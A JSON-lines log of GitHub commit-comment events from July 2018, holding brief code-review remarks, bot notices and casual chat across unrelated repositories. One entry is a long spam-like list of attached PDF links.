{"id":"7902432330","type":"CommitCommentEvent","actor":{"login":"yixiangz"},"repo":{"name":"yixiangz/ProgrammingAssignment2"},"payload":{"comment":{"id":29556427,"position":2,"line":5,"path":"cachematrix.R","commit_id":"f5fb6fb2c64f11789250edf9c789cb54a8842481","created_at":"2018-07-01T04:30:24Z","updated_at":"2018-07-01T04:30:24Z","author_association":"OWNER","body":"## makeCacheMatrix:creates a special \"matrix\" object that can cache its inverse."}},"created_at":"2018-07-01T04:30:24Z"}
{"id":"7902435146","type":"CommitCommentEvent","actor":{"login":"prisar"},"repo":{"name":"dotnet-architecture/eShopOnContainers"},"payload":{"comment":{"id":29556428,"position":39,"line":39,"path":"test/Services/UnitTest/Account/AccountControllerTest.cs","commit_id":"4e53f205b9b7a843e514a3cd3a6c64da15e6f97a","created_at":"2018-07-01T04:33:40Z","updated_at":"2018-07-01T04:33:40Z","author_association":"NONE","body":"Not able to test"}},"created_at":"2018-07-01T04:33:40Z"}
{"id":"7902435333","type":"CommitCommentEvent","actor":{"login":"Bubbymathis"},"repo":{"name":"Bubbymathis/spree"},"payload":{"comment":{"id":29556429,"position":33,"line":54,"path":"api/app/controllers/spree/api/v2/base_controller.rb","commit_id":"3ab453568de4899b12014b3528f70a17d741f684","created_at":"2018-07-01T04:33:55Z","updated_at":"2018-07-01T04:33:55Z","author_association":"OWNER","body":"Usd"}},"created_at":"2018-07-01T04:33:55Z"}
{"id":"7902437892","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29556433,"position":null,"line":null,"path":null,"commit_id":"10ea232a825729e741a071d3a101109bbd3fbbf7","created_at":"2018-07-01T04:36:56Z","updated_at":"2018-07-01T04:36:56Z","author_association":"MEMBER","body":"This is actually a great change."}},"created_at":"2018-07-01T04:36:56Z"}
{"id":"7902440467","type":"CommitCommentEvent","actor":{"login":"seakim"},"repo":{"name":"rronakk/ynah"},"payload":{"comment":{"id":29556438,"position":null,"line":null,"path":null,"commit_id":"d0c43c7bff3a4b9479de3ef71e677105968b0974","created_at":"2018-07-01T04:40:09Z","updated_at":"2018-07-01T04:40:09Z","author_association":"COLLABORATOR","body":"calling Giphy-API for placeholder (for other API calls) & future use.\r\n\r\nBug -\r\nhtml line 70:  Glyphicons do not show up.  Need to move the link to head if you want to test (trying to have thumbs up and down).\r\nCarousel works on right-side click for now. if you click the buttons, it appends (but it actually prepends) new slide.  But, one image delays when you click the button.  E.g> If you click the button once it create a slide, but does not move.  If you click one more time, it creates a new slide, but moves to the second last slide."}},"created_at":"2018-07-01T04:40:09Z"}
{"id":"7902441901","type":"CommitCommentEvent","actor":{"login":"1533987417"},"repo":{"name":"aben1188/awesome-wepy"},"payload":{"comment":{"id":29556439,"position":4,"line":90,"path":"README.md","commit_id":"0dc39ccd782927d02157f1cffc5f64545887d195","created_at":"2018-07-01T04:41:49Z","updated_at":"2018-07-01T04:41:49Z","author_association":"NONE","body":"加载中"}},"created_at":"2018-07-01T04:41:49Z"}
{"id":"7902444166","type":"CommitCommentEvent","actor":{"login":"SCouto97"},"repo":{"name":"mateusluizfb/oac-trabalho-final-uniciclo"},"payload":{"comment":{"id":29556441,"position":null,"line":null,"path":null,"commit_id":"a4bd1a8f828d2baf11c4d81dd3c606010f0713d9","created_at":"2018-07-01T04:44:38Z","updated_at":"2018-07-01T04:44:38Z","author_association":"COLLABORATOR","body":"Quando estiver nessa branch, lembrar de mudar top-level entity."}},"created_at":"2018-07-01T04:44:38Z"}
{"id":"7902445854","type":"CommitCommentEvent","actor":{"login":"Shigma"},"repo":{"name":"obstudio/Thulium-Music-3"},"payload":{"comment":{"id":29556447,"position":null,"line":null,"path":null,"commit_id":"f3da39101a75ca0c72e191388b02660ef86b69a0","created_at":"2018-07-01T04:46:36Z","updated_at":"2018-07-01T04:46:36Z","author_association":"MEMBER","body":"既然是 transparent，就别写到 scss 里面了，把这些 color 属性移到 editor.css 如何？@nn708 "}},"created_at":"2018-07-01T04:46:36Z"}
{"id":"7902446275","type":"CommitCommentEvent","actor":{"login":"NN708"},"repo":{"name":"obstudio/Thulium-Music-3"},"payload":{"comment":{"id":29556448,"position":null,"line":null,"path":null,"commit_id":"f3da39101a75ca0c72e191388b02660ef86b69a0","created_at":"2018-07-01T04:47:08Z","updated_at":"2018-07-01T04:47:08Z","author_association":"MEMBER","body":"可以，没问题"}},"created_at":"2018-07-01T04:47:08Z"}
{"id":"7902446973","type":"CommitCommentEvent","actor":{"login":"mfs91930"},"repo":{"name":"mfs91930/web1"},"payload":{"comment":{"id":29556451,"position":null,"line":null,"path":null,"commit_id":"019bd3180faab338e5909d7d0e5d976239c7f5a4","created_at":"2018-07-01T04:47:59Z","updated_at":"2018-07-01T04:47:59Z","author_association":"OWNER","body":"web1/image/plaync.jpg"}},"created_at":"2018-07-01T04:47:59Z"}
{"id":"7902450839","type":"CommitCommentEvent","actor":{"login":"sss123next"},"repo":{"name":"miranda-ng/miranda-ng"},"payload":{"comment":{"id":29556455,"position":null,"line":null,"path":null,"commit_id":"c6df3a4627f2f49515672b30427274275adf361d","created_at":"2018-07-01T04:52:40Z","updated_at":"2018-07-01T04:52:40Z","author_association":"COLLABORATOR","body":"xep-0198 i mean, just typo ..."}},"created_at":"2018-07-01T04:52:40Z"}
{"id":"7902452480","type":"CommitCommentEvent","actor":{"login":"aapav01"},"repo":{"name":"bluuman/jwaim"},"payload":{"comment":{"id":29556458,"position":9,"line":16,"path":"README.md","commit_id":"d7873dbcfddf62299d8b67a3741068bedb1e19ea","created_at":"2018-07-01T04:54:35Z","updated_at":"2018-07-01T04:54:35Z","author_association":"NONE","body":"i think there is a mis-merge ?"}},"created_at":"2018-07-01T04:54:35Z"}
{"id":"7902453964","type":"CommitCommentEvent","actor":{"login":"marybngozi"},"repo":{"name":"marybngozi/currentsea"},"payload":{"comment":{"id":29556460,"position":null,"line":null,"path":null,"commit_id":"49f2f0469110c235726804618c7a7ebf722c23a0","created_at":"2018-07-01T04:56:20Z","updated_at":"2018-07-01T04:56:20Z","author_association":"OWNER","body":"yeah"}},"created_at":"2018-07-01T04:56:20Z"}
{"id":"7902454659","type":"CommitCommentEvent","actor":{"login":"jaesmon"},"repo":{"name":"jaesmon/inmobiliaria-techo"},"payload":{"comment":{"id":29556463,"position":null,"line":null,"path":null,"commit_id":"ad071a2d20a88cef2d22dd7aeb3028a6486340e6","created_at":"2018-07-01T04:57:12Z","updated_at":"2018-07-01T04:57:12Z","author_association":"OWNER","body":"m"}},"created_at":"2018-07-01T04:57:12Z"}
{"id":"7902454750","type":"CommitCommentEvent","actor":{"login":"mrpotatofactory"},"repo":{"name":"r-gmod/gmod-sandbox"},"payload":{"comment":{"id":29556464,"position":null,"line":null,"path":null,"commit_id":"cc8923abda303403a0a1e1dd7d9f494e545bed21","created_at":"2018-07-01T04:57:20Z","updated_at":"2018-07-01T04:57:20Z","author_association":"MEMBER","body":"I'm really not sure"}},"created_at":"2018-07-01T04:57:20Z"}
{"id":"7902455968","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556468,"position":null,"line":null,"path":null,"commit_id":"f3cde00e33f79b5ebf80a041cf0b6adc5d14fe4c","created_at":"2018-07-01T04:58:46Z","updated_at":"2018-07-01T04:58:46Z","author_association":"OWNER","body":"You are accessing a field directly, but the coupling to the field is becoming awkward.\r\nCreate getting and setting methods for the field and use only those to access the field."}},"created_at":"2018-07-01T04:58:46Z"}
{"id":"7902456665","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556469,"position":null,"line":null,"path":null,"commit_id":"f3cde00e33f79b5ebf80a041cf0b6adc5d14fe4c","created_at":"2018-07-01T04:59:29Z","updated_at":"2018-07-01T04:59:29Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131182-97970c1c-7d19-11e8-85d4-85b3315fefda.png)\r\n"}},"created_at":"2018-07-01T04:59:29Z"}
{"id":"7902457075","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556470,"position":null,"line":null,"path":null,"commit_id":"f3cde00e33f79b5ebf80a041cf0b6adc5d14fe4c","created_at":"2018-07-01T04:59:59Z","updated_at":"2018-07-01T04:59:59Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42131185-a3e2c402-7d19-11e8-8f50-80564c39d6e3.png)\r\n"}},"created_at":"2018-07-01T04:59:59Z"}
{"id":"7902457461","type":"CommitCommentEvent","actor":{"login":"rockwood"},"repo":{"name":"garybernhardt/dotfiles"},"payload":{"comment":{"id":29556475,"position":null,"line":null,"path":null,"commit_id":"11faee2da1c529745e2aa4f082cecd5225b2cca8","created_at":"2018-07-01T05:00:15Z","updated_at":"2018-07-01T05:00:15Z","author_association":"NONE","body":"I noticed that it's the coloring of `--graph` that's breaking `column`. It turns out you can leave the graph uncolored by removing the `--color=always` flag and instead specify it for the individual color specs. Ie: \r\n\r\n```\r\nLOG_HASH=\"%C(always,yellow)%h%C(always,reset)\"\r\nLOG_RELATIVE_TIME=\"%C(always,green)(%ar)%C(always,reset)\"\r\nLOG_AUTHOR=\"%C(always,blue)<%an>%C(always,reset)\"\r\nLOG_SUBJECT=\"%s\"\r\nLOG_REFS=\"%C(always,red)%d%C(always,reset)\"\r\n```\r\n\r\nAs much as I admire the regex foo of `color-git-log`, this option seems a bit cleaner.\r\n\r\nFrom the git-log docs:\r\n\r\n> Specifying %C(always,...) will show the colors even when color is not otherwise enabled."}},"created_at":"2018-07-01T05:00:15Z"}
{"id":"7902459630","type":"CommitCommentEvent","actor":{"login":"daidai21"},"repo":{"name":"daidai21/daidai21.github.io"},"payload":{"comment":{"id":29556478,"position":null,"line":null,"path":null,"commit_id":"80d482127ba673c20ea7d0869fa4e70fef8afb8b","created_at":"2018-07-01T05:02:21Z","updated_at":"2018-07-01T05:02:21Z","author_association":"OWNER","body":"域名解析"}},"created_at":"2018-07-01T05:02:21Z"}
{"id":"7902460104","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29556479,"position":null,"line":null,"path":null,"commit_id":"73f250ba883b21d058391713f21408854e6376ff","created_at":"2018-07-01T05:02:55Z","updated_at":"2018-07-01T05:02:55Z","author_association":"OWNER","body":"When you are using self-encapsulation you have to be careful about using the **_setting method in\r\nthe constructor_**. Often it is assumed that you use the setting method for changes after the object\r\nis created, so you may have different behavior in the setter than you have when initializing."}},"created_at":"2018-07-01T05:02:55Z"}
{"id":"7902460476","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29556481,"position":null,"line":null,"path":null,"commit_id":"320861ee4a127d43f0cf0993e97333d5d4bc893a","created_at":"2018-07-01T05:03:19Z","updated_at":"2018-07-01T05:03:19Z","author_association":"COLLABORATOR","body":"Puzzle `262-ee9602d6` disappeared from [`test/test_atomic_file.rb`](https://github.com/zold-io/zold/blob/master/test/test_atomic_file.rb), that's why I closed #264. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-01T05:03:19Z"}
{"id":"7902460833","type":"CommitCommentEvent","actor":{"login":"South-Paw"},"repo":{"name":"South-Paw/salien-script-js"},"payload":{"comment":{"id":29556484,"position":7,"line":225,"path":"src/index.js","commit_id":"3960daac3429d880d50bde69454024aa7424ccfb","created_at":"2018-07-01T05:03:43Z","updated_at":"2018-07-01T05:03:43Z","author_association":"OWNER","body":"My bad, if you log the .__headers you get the following;\r\n\r\n```\r\nHeaders {\r\n  [Symbol(map)]:\r\n   { 'x-eresult': [ '1' ],\r\n     'content-type': [ 'application/json; charset=UTF-8' ],\r\n     vary: [ 'Accept-Encoding' ],\r\n     'content-encoding': [ 'gzip' ],\r\n     expires: [ 'Sun, 01 Jul 2018 05:01:43 GMT' ],\r\n     date: [ 'Sun, 01 Jul 2018 05:01:43 GMT' ],\r\n     'content-length': [ '2105' ],\r\n     connection: [ 'close' ] } }\r\n```\r\n\r\nSo I believed that since it is `'x-eresult': [ '1' ],` then that looks like a key=>array relationship hence the `[0]` but upon logging it you're quiet correct - so thank you for the fix 👍 "}},"created_at":"2018-07-01T05:03:43Z"}
{"id":"7902462587","type":"CommitCommentEvent","actor":{"login":"FuentesFelipe"},"repo":{"name":"DiegoSepu97/proyectoNoviaFrankenstein"},"payload":{"comment":{"id":29556486,"position":null,"line":null,"path":null,"commit_id":"554350a33580d857d5b5e8130d08d254ac69ed7c","created_at":"2018-07-01T05:05:40Z","updated_at":"2018-07-01T05:05:40Z","author_association":"COLLABORATOR","body":"Diego. Siempre digo lo mismo. Pero en algún momento le daré vueltas y retomaré con ARQ. jajaj ya no me crees. "}},"created_at":"2018-07-01T05:05:40Z"}
{"id":"7902464937","type":"CommitCommentEvent","actor":{"login":"ibnesayeed"},"repo":{"name":"oduwsdl/MementoEmbed"},"payload":{"comment":{"id":29556489,"position":6,"line":3,"path":"Dockerfile","commit_id":"abc07d1a2dd4ba012b8a1aa0a5e057be74ecb67e","created_at":"2018-07-01T05:08:16Z","updated_at":"2018-07-01T05:08:16Z","author_association":"MEMBER","body":"@shawnmjones while minimizing layers is often a good idea, but not always. In this case keeping `pip install` separate from `apt install` might be a better approach for logical separation and better layer caching as the two tasks are unrelated and controlled by different toolsets and ecosystem (one from PyPi repo and the other from Apt repo)."}},"created_at":"2018-07-01T05:08:16Z"}
{"id":"7902470496","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"guilgautier/DPPy"},"payload":{"comment":{"id":29556495,"position":40,"line":40,"path":"tests/test_marginals.py","commit_id":"d074667fad0e246c81e410f78350d037ac2a580d","created_at":"2018-07-01T05:14:06Z","updated_at":"2018-07-01T05:14:06Z","author_association":"COLLABORATOR","body":"Looks like a medical study paper, \"fail if pval > 0.05\" !\r\nLGTM [![LGTM](http://www.lgtm.in/p/ssDrEyk4q)](http://www.lgtm.in/i/ssDrEyk4q)"}},"created_at":"2018-07-01T05:14:06Z"}
{"id":"7902473784","type":"CommitCommentEvent","actor":{"login":"neoblizz"},"repo":{"name":"gunrock/docs"},"payload":{"comment":{"id":29556502,"position":5,"line":7,"path":"source/index.html.md","commit_id":"45c58f98ecaff66c70d15b46a47a54b54ae73681","created_at":"2018-07-01T05:17:32Z","updated_at":"2018-07-01T05:17:32Z","author_association":"MEMBER","body":"This will break the code, colon creates a new section of the table. I know it sucks!"}},"created_at":"2018-07-01T05:17:32Z"}
{"id":"7902474399","type":"CommitCommentEvent","actor":{"login":"Bubbymathis"},"repo":{"name":"Bubbymathis/spree"},"payload":{"comment":{"id":29556503,"position":null,"line":null,"path":null,"commit_id":"3ab453568de4899b12014b3528f70a17d741f684","created_at":"2018-07-01T05:18:13Z","updated_at":"2018-07-01T05:18:13Z","author_association":"OWNER","body":"\r\n      \r\n       \r\n\r\nhttps://github.com/Bubbymathis/Bubby.git\r\n[GenRev (1).pdf](https://github.com/Bubbymathis/spree/files/2152434/GenRev.1.pdf)\r\n[SEC00 (1).pdf](https://github.com/Bubbymathis/spree/files/2152435/SEC00.1.pdf)\r\n[SEC10.pdf](https://github.com/Bubbymathis/spree/files/2152436/SEC10.pdf)\r\n[glib387_RefundPolicy.pdf](https://github.com/Bubbymathis/spree/files/2152438/glib387_RefundPolicy.pdf)\r\n[glib642_CTFOPRODUCTPRICESCV.pdf](https://github.com/Bubbymathis/spree/files/2152439/glib642_CTFOPRODUCTPRICESCV.pdf)\r\n[dmca.pdf](https://github.com/Bubbymathis/spree/files/2152440/dmca.pdf)\r\n[glib327_CTFOPrivacyPolicy.pdf](https://github.com/Bubbymathis/spree/files/2152441/glib327_CTFOPrivacyPolicy.pdf)\r\n[glib347_CTFOPoliciesandProcedures.pdf](https://github.com/Bubbymathis/spree/files/2152442/glib347_CTFOPoliciesandProcedures.pdf)\r\n[rulesQ1.pdf](https://github.com/Bubbymathis/spree/files/2152443/rulesQ1.pdf)\r\n[glib640_NewAssociateInstructions.pdf](https://github.com/Bubbymathis/spree/files/2152444/glib640_NewAssociateInstructions.pdf)\r\n[glib187_Shake0ffOriginal.pdf](https://github.com/Bubbymathis/spree/files/2152445/glib187_Shake0ffOriginal.pdf)\r\n[official-typerium-whitepaper.pdf](https://github.com/Bubbymathis/spree/files/2152446/official-typerium-whitepaper.pdf)\r\n[glib157_Shake0ffChocolate.pdf](https://github.com/Bubbymathis/spree/files/2152447/glib157_Shake0ffChocolate.pdf)\r\n[glib377_TransferorSaleofPositionForm.pdf](https://github.com/Bubbymathis/spree/files/2152448/glib377_TransferorSaleofPositionForm.pdf)\r\n[glib650_Testimonial_Sample.pdf](https://github.com/Bubbymathis/spree/files/2152449/glib650_Testimonial_Sample.pdf)\r\n[26847461-0-The-InvestorsGuideTo.pdf](https://github.com/Bubbymathis/spree/files/2152450/26847461-0-The-InvestorsGuideTo.pdf)\r\n[glib653_Testimonial_Blank.docx](https://github.com/Bubbymathis/spree/files/2152451/glib653_Testimonial_Blank.docx)\r\n[glib651_Testimonial_Blank.pdf](https://github.com/Bubbymathis/spree/files/2152452/glib651_Testimonial_Blank.pdf)\r\n[glib317_CTFOTermsandConditions.pdf](https://github.com/Bubbymathis/spree/files/2152453/glib317_CTFOTermsandConditions.pdf)\r\n[glib177_super7label.pdf](https://github.com/Bubbymathis/spree/files/2152454/glib177_super7label.pdf)\r\n[glib397_SponsorChangeRequestForm.pdf](https://github.com/Bubbymathis/spree/files/2152455/glib397_SponsorChangeRequestForm.pdf)\r\n[glib407_SponsorChangeReleaseForm.pdf](https://github.com/Bubbymathis/spree/files/2152456/glib407_SponsorChangeReleaseForm.pdf)\r\n[staramba_lightpaper.pdf](https://github.com/Bubbymathis/spree/files/2152457/staramba_lightpaper.pdf)\r\n[glib267_ThePowerofProfitSharingPositions.pdf](https://github.com/Bubbymathis/spree/files/2152458/glib267_ThePowerofProfitSharingPositions.pdf)\r\n[glib654_Testimonial_Sample.docx](https://github.com/Bubbymathis/spree/files/2152459/glib654_Testimonial_Sample.docx)\r\n[background_check_form_comm_inc.pdf](https://github.com/Bubbymathis/spree/files/2152460/background_check_form_comm_inc.pdf)\r\n[Slack_ISO_27018_Certificate_010-111017-001_-_Issued.pdf](https://github.com/Bubbymathis/spree/files/2152461/Slack_ISO_27018_Certificate_010-111017-001_-_Issued.pdf)\r\n[h2020-hi-swiss-part_en.pdf](https://github.com/Bubbymathis/spree/files/2152462/h2020-hi-swiss-part_en.pdf)\r\n[Slack_2017_ISO_27001_Certificate_009-111017-001_-_Issued.pdf](https://github.com/Bubbymathis/spree/files/2152463/Slack_2017_ISO_27001_Certificate_009-111017-001_-_Issued.pdf)\r\n[h2020-hi-list-ac_en.pdf](https://github.com/Bubbymathis/spree/files/2152464/h2020-hi-list-ac_en.pdf)\r\n[Slack_SOC_3_Report (1).pdf](https://github.com/Bubbymathis/spree/files/2152465/Slack_SOC_3_Report.1.pdf)\r\n[data_and_protection.pdf](https://github.com/Bubbymathis/spree/files/2152466/data_and_protection.pdf)\r\n[Slack_SOC_3_Report.pdf](https://github.com/Bubbymathis/spree/files/2152467/Slack_SOC_3_Report.pdf)\r\n[Noticetostakeholders_Brexitpreparedness_personaldataprotectionpdf.pdf](https://github.com/Bubbymathis/spree/files/2152468/Noticetostakeholders_Brexitpreparedness_personaldataprotectionpdf.pdf)\r\n[att-collaboration-infographic-the-motivator.pdf](https://github.com/Bubbymathis/spree/files/2152469/att-collaboration-infographic-the-motivator.pdf)\r\n[PS Overview for Businesses.pdf](https://github.com/Bubbymathis/spree/files/2152470/PS.Overview.for.Businesses.pdf)\r\n[Original.pdf](https://github.com/Bubbymathis/spree/files/2152471/Original.pdf)\r\n[commissionssummary.pdf](https://github.com/Bubbymathis/spree/files/2152472/commissionssummary.pdf)\r\n[Mail.Ru - You have a Huge chance to Win It..pdf](https://github.com/Bubbymathis/spree/files/2152473/Mail.Ru.-.You.have.a.Huge.chance.to.Win.It.pdf)\r\n[SEC05.pdf](https://github.com/Bubbymathis/spree/files/2152474/SEC05.pdf)\r\n[SEC03.pdf](https://github.com/Bubbymathis/spree/files/2152475/SEC03.pdf)\r\n[SEC02.pdf](https://github.com/Bubbymathis/spree/files/2152476/SEC02.pdf)\r\n[SEC01.pdf](https://github.com/Bubbymathis/spree/files/2152477/SEC01.pdf)\r\n[GenRev.pdf](https://github.com/Bubbymathis/spree/files/2152478/GenRev.pdf)\r\n[Direct_Account_Transfers_FAQ.pdf](https://github.com/Bubbymathis/spree/files/2152479/Direct_Account_Transfers_FAQ.pdf)\r\n[SEC00.pdf](https://github.com/Bubbymathis/spree/files/2152480/SEC00.pdf)\r\n[Welcome Steps for CTFO (2).pdf](https://github.com/Bubbymathis/spree/files/2152481/Welcome.Steps.for.CTFO.2.pdf)\r\n[cap-spending-09-2015_en.pdf](https://github.com/Bubbymathis/spree/files/2152482/cap-spending-09-2015_en.pdf)\r\n[Welcome Steps for CTFO (1).pdf](https://github.com/Bubbymathis/spree/files/2152483/Welcome.Steps.for.CTFO.1.pdf)\r\n[set-up-efsi-investment-platform_en.pdf](https://github.com/Bubbymathis/spree/files/2152484/set-up-efsi-investment-platform_en.pdf)\r\n[opperational-guidance-fundamental-rights-in-impact-assessments_en (1).pdf](https://github.com/Bubbymathis/spree/files/2152485/opperational-guidance-fundamental-rights-in-impact-assessments_en.1.pdf)\r\n[opperational-guidance-fundamental-rights-in-impact-assessments_en.pdf](https://github.com/Bubbymathis/spree/files/2152486/opperational-guidance-fundamental-rights-in-impact-assessments_en.pdf)\r\n[COM%3A2010%3A0573%3AFIN%3Aen%3ATXT.pdf](https://github.com/Bubbymathis/spree/files/2152487/COM.3A2010.3A0573.3AFIN.3Aen.3ATXT.pdf)\r\n[GenRev (1).pdf](https://github.com/Bubbymathis/spree/files/2152488/GenRev.1.pdf)\r\n[SEC00 (1).pdf](https://github.com/Bubbymathis/spree/files/2152489/SEC00.1.pdf)\r\n[MOBE-Compensation-Plan.pdf](https://github.com/Bubbymathis/spree/files/2152490/MOBE-Compensation-Plan.pdf)\r\n[SEC10.pdf](https://github.com/Bubbymathis/spree/files/2152491/SEC10.pdf)\r\n[SEC09.pdf](https://github.com/Bubbymathis/spree/files/2152492/SEC09.pdf)\r\n[SEC08.pdf](https://github.com/Bubbymathis/spree/files/2152493/SEC08.pdf)\r\n[SEC07.pdf](https://github.com/Bubbymathis/spree/files/2152494/SEC07.pdf)\r\n[SEC06.pdf](https://github.com/Bubbymathis/spree/files/2152495/SEC06.pdf)\r\n[SEC03 (1).pdf](https://github.com/Bubbymathis/spree/files/2152496/SEC03.1.pdf)\r\n[SEC04.pdf](https://github.com/Bubbymathis/spree/files/2152497/SEC04.pdf)\r\n[Кабинет  (3).docx](https://github.com/Bubbymathis/spree/files/2152498/3.docx)\r\n[we-small-banking-technology-foundation.pdf](https://github.com/Bubbymathis/spree/files/2152499/we-small-banking-technology-foundation.pdf)\r\n[030201_1-3.pdf](https://github.com/Bubbymathis/spree/files/2152500/030201_1-3.pdf)\r\n[download.pdf](https://github.com/Bubbymathis/spree/files/2152501/download.pdf)\r\n[transfer-hu.pdf](https://github.com/Bubbymathis/spree/files/2152502/transfer-hu.pdf)\r\n[name-personal_hu.pdf](https://github.com/Bubbymathis/spree/files/2152503/name-personal_hu.pdf)\r\n[glib577_CommissionPaymentShedule.pdf](https://github.com/Bubbymathis/spree/files/2152504/glib577_CommissionPaymentShedule.pdf)\r\n[billingchange-hu.pdf](https://github.com/Bubbymathis/spree/files/2152505/billingchange-hu.pdf)\r\n[billingmail-hu.pdf](https://github.com/Bubbymathis/spree/files/2152506/billingmail-hu.pdf)\r\n[glib638_CBDProductLabels.pdf](https://github.com/Bubbymathis/spree/files/2152507/glib638_CBDProductLabels.pdf)\r\n[personal-hu.pdf](https://github.com/Bubbymathis/spree/files/2152508/personal-hu.pdf)\r\n[glib655_CTFOProductBrochure.pdf](https://github.com/Bubbymathis/spree/files/2152509/glib655_CTFOProductBrochure.pdf)\r\n[google-surveys-whitepaper.pdf](https://github.com/Bubbymathis/spree/files/2152510/google-surveys-whitepaper.pdf)\r\n[glib357_CTFOPaperApplicationwithTermsConditions.pdf](https://github.com/Bubbymathis/spree/files/2152511/glib357_CTFOPaperApplicationwithTermsConditions.pdf)\r\n[glib649_CBDOilDropsandInstructionsBrochure.pdf](https://github.com/Bubbymathis/spree/files/2152512/glib649_CBDOilDropsandInstructionsBrochure.pdf)\r\n[glib648_PayPlanTraining.pptx](https://github.com/Bubbymathis/spree/files/2152513/glib648_PayPlanTraining.pptx)\r\n[personal-hu (1).pdf](https://github.com/Bubbymathis/spree/files/2152514/personal-hu.1.pdf)\r\n[glib639_PayPlanOverview.pdf](https://github.com/Bubbymathis/spree/files/2152515/glib639_PayPlanOverview.pdf)\r\n[Model_Feed_Tool_Documentation.pdf](https://github.com/Bubbymathis/spree/files/2152516/Model_Feed_Tool_Documentation.pdf)\r\n[glib247_PayPlanChart.pdf](https://github.com/Bubbymathis/spree/files/2152517/glib247_PayPlanChart.pdf)\r\n[glib617_HowtoPlaceaOneTimeOrder.pdf](https://github.com/Bubbymathis/spree/files/2152518/glib617_HowtoPlaceaOneTimeOrder.pdf)\r\n[glib607_HowtoManageYourAutoShip.pdf](https://github.com/Bubbymathis/spree/files/2152519/glib607_HowtoManageYourAutoShip.pdf)\r\n[glib597_HowToActivateYourGPGAccount.pdf](https://github.com/Bubbymathis/spree/files/2152520/glib597_HowToActivateYourGPGAccount.pdf)\r\n[glib77_HowtoAccessYourCommissionsinGPG.pdf](https://github.com/Bubbymathis/spree/files/2152521/glib77_HowtoAccessYourCommissionsinGPG.pdf)\r\n[glib637_FrequentlyAskedQuestions.pdf](https://github.com/Bubbymathis/spree/files/2152522/glib637_FrequentlyAskedQuestions.pdf)\r\n[Welcome Steps for CTFO.pdf](https://github.com/Bubbymathis/spree/files/2152523/Welcome.Steps.for.CTFO.pdf)\r\n[Livestream Bugeting Guide.pdf](https://github.com/Bubbymathis/spree/files/2152524/Livestream.Bugeting.Guide.pdf)\r\n[GenerateDirectDepositPDF.pdf](https://github.com/Bubbymathis/spree/files/2152525/GenerateDirectDepositPDF.pdf)\r\n[Accelerated_5400-RM_Cellular_Remote_Manager_Data_Sheet.pdf](https://github.com/Bubbymathis/spree/files/2152526/Accelerated_5400-RM_Cellular_Remote_Manager_Data_Sheet.pdf)\r\n[Accelerated_Core_of_Securing_Networks_v2_PDF.pdf](https://github.com/Bubbymathis/spree/files/2152527/Accelerated_Core_of_Securing_Networks_v2_PDF.pdf)\r\n\r\n[glib643_LabResultsHowtoread.pdf](https://github.com/Bubbymathis/spree/files/2152528/glib643_LabResultsHowtoread.pdf)\r\n[glib647_LabResults1500mg.pdf](https://github.com/Bubbymathis/spree/files/2152529/glib647_LabResults1500mg.pdf)\r\n[glib646_LabResults750mg.pdf](https://github.com/Bubbymathis/spree/files/2152530/glib646_LabResults750mg.pdf)\r\n[glib645_LabResults500mg.pdf](https://github.com/Bubbymathis/spree/files/2152531/glib645_LabResults500mg.pdf)\r\n[glib644_LabResults300mg.pdf](https://github.com/Bubbymathis/spree/files/2152532/glib644_LabResults300mg.pdf)\r\n[glib587_HowtoTransferYourCommissions.pdf](https://github.com/Bubbymathis/spree/files/2152533/glib587_HowtoTransferYourCommissions.pdf)\r\n[glib367_MediaReleaseForm.pdf](https://github.com/Bubbymathis/spree/files/2152534/glib367_MediaReleaseForm.pdf)\r\n[glib661_lrexplained.pdf](https://github.com/Bubbymathis/spree/files/2152535/glib661_lrexplained.pdf)\r\n[My-Wealth-Tool-Kit-Quick-Start-Guide.pdf](https://github.com/Bubbymathis/spree/files/2152536/My-Wealth-Tool-Kit-Quick-Start-Guide.pdf)\r\n[glib657_lrisolate1500.pdf](https://github.com/Bubbymathis/spree/files/2152537/glib657_lrisolate1500.pdf)\r\n[glib660_lrisolate500.pdf](https://github.com/Bubbymathis/spree/files/2152538/glib660_lrisolate500.pdf)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n[GenRev (1).pdf](https://github.com/Bubbymathis/spree/files/2152393/GenRev.1.pdf)\r\n[SEC00 (1).pdf](https://github.com/Bubbymathis/spree/files/2152394/SEC00.1.pdf)\r\n[SEC10.pdf](https://github.com/Bubbymathis/spree/files/2152396/SEC10.pdf)\r\n[SEC10.pdf](https://github.com/Bubbymathis/spree/files/2152397/SEC10.pdf)\r\n[SEC09.pdf](https://github.com/Bubbymathis/spree/files/2152398/SEC09.pdf)\r\n[SEC08.pdf](https://github.com/Bubbymathis/spree/files/2152399/SEC08.pdf)\r\n[SEC07.pdf](https://github.com/Bubbymathis/spree/files/2152400/SEC07.pdf)\r\n[SEC08.pdf](https://github.com/Bubbymathis/spree/files/2152401/SEC08.pdf)\r\n[SEC07.pdf](https://github.com/Bubbymathis/spree/files/2152402/SEC07.pdf)\r\n[SEC06.pdf](https://github.com/Bubbymathis/spree/files/2152403/SEC06.pdf)\r\n"}},"created_at":"2018-07-01T05:18:13Z"}
{"id":"7902475181","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29556504,"position":4,"line":17,"path":"proprietary-files.txt","commit_id":"91b6a2a6374583432f66defc12238f3de8b8164c","created_at":"2018-07-01T05:19:06Z","updated_at":"2018-07-01T05:19:06Z","author_association":"MEMBER","body":"i didnt had these before, added later. no diff. so bye bye again"}},"created_at":"2018-07-01T05:19:06Z"}
